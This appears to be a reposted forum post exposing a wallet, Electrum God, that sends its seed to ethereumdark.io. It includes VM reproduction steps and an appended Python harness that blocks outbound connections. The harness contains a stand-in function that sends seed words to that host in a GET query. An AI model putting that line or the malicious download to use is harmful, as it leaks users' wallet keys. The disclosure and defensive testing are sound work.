Saturday 29 December 2018

Caught http://bit.ly/2BMFKuM wallet red-handed trying to steal bitcoin keys!

Before installing Electrum God in a virtual machine, I had disconnected its network adapter. The wallet really did not like this, and terminated with the following Python error:

urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='ethereumdark.io', port=80): Max retries exceeded with url: /electrum/seeds.php?seed=wife+scar+free+royal+...+grey (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fafcf62cb38>: Failed to establish a new connection: [Errno -2] Name or service not known',))

It immediately tried to reach the ethereumdark.io site with a view to transmitting the Electrum seed to the /electrum/seeds.php?seed={seed} script; the seed words are already visible in the query string of the traceback above. Since every key in an Electrum wallet is derived from its seed, whoever receives that request controls the wallet.

If you want to reproduce the theft attempt, do the following:

[1] install Virtualbox or similar

[2] create a virtual machine

[3] download the wallet from https://electrumgod.org

[4] install the system-level dependencies: sudo apt-get install python3-setuptools python3-pyqt5 python3-pip

[5] install the Python-level dependencies: cd electrum; sudo python3 -m pip install . (this runs the package's own setup code as root, which is one more reason to do it only inside a throwaway VM)

[6] disconnect the virtual machine from the network

[7] run: ./electrum

[8] generate a new seed during first run in the startup wizard

[9] watch the wallet abort while it tries to upload your seed to ethereumdark.io

REMARK: This should remind you that, whatever else you do, you should NEVER allow your secrets (the seed, and the private keys derived from it) to touch the network.

That is why it is so important to export the unsigned transaction from the network-connected viewer (virtual) machine to the network-disconnected signer (virtual) machine, sign it there, and import the signed transaction back into the viewer machine, which is the only one that ever broadcasts anything.

In that case, even if the wallet is subverted, corrupted, or infected, it cannot phone home and so cannot steal your secrets; the only thing that ever leaves the signer is the signed transaction you carry back, which is the one artifact worth inspecting before you broadcast it.
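As an added example (not code from the original post or from the Electrum God wallet): the same check as steps [6] to [9] above, and the remark's rule that secrets must never touch the network, done inside the process instead of at the VM's network adapter. NetworkGuard patches the socket layer so that every name lookup or connection the wallet attempts is refused and logged with its destination, which turns a silent upload into the loud failure seen in the traceback even on a connected machine. leaky_wallet_startup is a constructed stand-in that reproduces the reported behaviour (a GET to ethereumdark.io with the seed words in the query string) and direct_connect stands in for code that skips DNS and uses a hard-coded IP; the seed words, function names, the 192.0.2.1 address and the timeout are assumptions, not the wallet's code.

```python
# Added example (not the original post's or the Electrum God wallet's code):
# refuse and record every outbound network attempt an untrusted wallet makes,
# so a seed upload fails loudly even with the VM's adapter still connected.
import socket
import urllib.parse
import urllib.request
from contextlib import contextmanager

BLOCKED_MESSAGE = "outbound network access refused by NetworkGuard"


class NetworkGuard:
    """Refuses and records every attempt to resolve or connect to a host."""

    def __init__(self):
        self.attempts = []  # (host, port) tuples in the order they occurred

    def _record(self, host, port):
        try:
            port = int(port)
        except (TypeError, ValueError):  # None, or a service name like "http"
            pass
        self.attempts.append((str(host), port))

    @contextmanager
    def active(self):
        """Patch socket.getaddrinfo and socket.socket.connect for the block."""
        guard = self

        def deny_getaddrinfo(host, port, *args, **kwargs):
            # urllib, requests and urllib3 all end up in socket.create_connection,
            # whose first step is getaddrinfo: the destination host is named here.
            guard._record(host, port)
            raise socket.gaierror(BLOCKED_MESSAGE)

        def deny_connect(sock, address):
            # Catches code that skips DNS and connects straight to an IP literal.
            if isinstance(address, tuple):
                guard._record(address[0], address[1])
            else:  # AF_UNIX path
                guard._record(address, None)
            raise PermissionError(BLOCKED_MESSAGE)

        orig_getaddrinfo = socket.getaddrinfo
        had_own_connect = "connect" in vars(socket.socket)
        orig_connect = socket.socket.connect
        socket.getaddrinfo = deny_getaddrinfo
        socket.socket.connect = deny_connect
        try:
            yield guard
        finally:
            socket.getaddrinfo = orig_getaddrinfo
            if had_own_connect:
                socket.socket.connect = orig_connect
            else:
                del socket.socket.connect


def leaky_wallet_startup(seed_words):
    """Constructed stand-in for the reported behaviour (not the wallet's code):
    ship the seed in a GET to http://ethereumdark.io/electrum/seeds.php?seed=..."""
    query = urllib.parse.urlencode({"seed": " ".join(seed_words)})
    url = "http://ethereumdark.io/electrum/seeds.php?" + query
    # ProxyHandler({}) ignores any http_proxy variable, so the request names
    # the real destination rather than a local proxy.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=5) as resp:
        return resp.read()


def direct_connect(host, port):
    """Stand-in for code that bypasses DNS with a hard-coded IP address."""
    with socket.socket() as sock:
        sock.connect((host, port))


def run_guarded(entry_point, *args):
    """Run entry_point(*args) with networking refused.

    Returns (finished_normally, attempts). A wallet that treats the network
    as optional finishes with an empty list; one that aborts after naming a
    third-party host during seed generation is the case the post describes.
    """
    guard = NetworkGuard()
    with guard.active():
        try:
            entry_point(*args)
            finished = True
        except OSError:  # URLError, gaierror and PermissionError are all OSError
            finished = False
    return finished, list(guard.attempts)


if __name__ == "__main__":
    seed = ["wife", "scar", "free", "royal", "grey"]  # constructed, not a real seed
    finished, attempts = run_guarded(leaky_wallet_startup, seed)
    print("wallet finished normally:", finished)
    for host, port in attempts:
        print(f"blocked outbound attempt to {host}:{port}")
```

To apply this to a real Python wallet, import the guard into the interpreter that runs it and call the wallet's entry point inside guard.active(); the guard only sees destinations, not URLs, but a wallet that names a third-party host while generating a seed has already condemned itself, and the traceback above shows what the URL carried. Before running anything, grep -rn 'seeds.php\|ethereumdark' over the unpacked download shows whether that host is hard-coded in the source. For wallets that are not Python, the same idea at kernel level on Linux is unshare -rn ./wallet, which starts the process in a fresh network namespace with no usable interface.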



Submitted December 29, 2018 at 09:49AM by mimblezimble http://bit.ly/2QY7rv2
